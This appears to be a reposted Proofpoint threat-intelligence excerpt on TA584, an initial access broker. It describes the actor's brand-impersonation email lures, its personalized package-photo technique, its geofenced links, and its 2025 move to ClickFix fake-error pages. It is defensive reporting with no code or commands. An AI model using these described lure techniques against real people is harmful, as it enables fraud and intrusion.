Cant Stop Wont Stop Ta584 Innovates Initial Access

TA584 is one of the most prominent cybercriminal threat actors tracked by Proofpoint threat researchers. In 2025, the actor demonstrated multiple attack chain changes including expanded global targeting; ClickFix social engineering; and delivering new malware, Tsundere Bot. TA584’s activity is unique in the cybercrime landscape and shows how static detections alone are not reliable for constantly innovating threat actors. Proofpoint tracks multiple sophisticated cybercriminal threat actors, and one of the most frequently active with high volume campaigns is TA584. TA584 is a prominent initial access broker (IAB) that targets organizations globally. The actor’s operational tempo increased throughout 2025, with the number of monthly campaigns tripling from March to December 2025.

While TA584 has been tracked for several years, its earlier campaigns followed relatively predictable patterns compared to the variety of techniques observed in 2025. One of the most notable shifts in TA584’s activity during 2025 is how quickly campaigns are launched, modified, and retired. In contrast, 2025 activity is characterized by high campaign churn and short operational lifespans. Instead of refining a single successful attack chain, TA584 favors continuous iteration, rapidly cycling through various tactics, techniques, and procedures (TTPs), even when prior campaigns remained effective. The consistency of this pattern throughout 2025 shows how a steady stream of brief, thematically distinct campaigns originating from the same actor provides insight into how modern financially-motivated threat actors adapt to defensive pressure.

TA584 sends emails impersonating various organizations. Impersonated entities include job-related firms (such as Michael Page, Addeco) or business services (BBB, Companies House), as well as brands like PayPal, OSHA, Medicare, OneDrive, or YourCostSolutions. The most frequently observed vertical impersonated is healthcare, followed by government entities. TA584 demonstrates unique social engineering content using a very wide range of themes and techniques used to get people to engage with malicious content. The emails and associated landing pages always match, with well-designed and believable lures. In several cases, brand selection appears aligned with geographic targeting, with localized or regionally relevant brands used to increase credibility among specific recipients. One campaign in December used a unique social engineering technique: including a photo of an alleged package delivery that contained the name of the recipient in the email lure. In the emails, TA584 included a photo of supposed physical mail that displayed the targets’ name and address, customized to each recipient. Proofpoint rarely observes this technique, however we have seen it used by TA2725 in recent months.

TA584 uses multiple delivery methods via email. In 2025, the actor most often sent emails from compromised individual senders. The emails usually contain unique links for each target that performs geofencing and IP filtering. Between March 2021 and July 2025, the landing page featured a countdown, the target’s name (from a query in the URL), and a CAPTCHA. Solving the CAPTCHA revealed a download button for a zipped JavaScript or shortcut (.lnk) file. From late July 2025, the actor switched to using the ClickFix technique. The ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer. First observed in 2024, the ClickFix technique is now used by many different threat actors that customize the landing pages based on lure theme and objective.

To read the complete article see: Proofpoint Threat Insight

🌐 Source: Proofpoint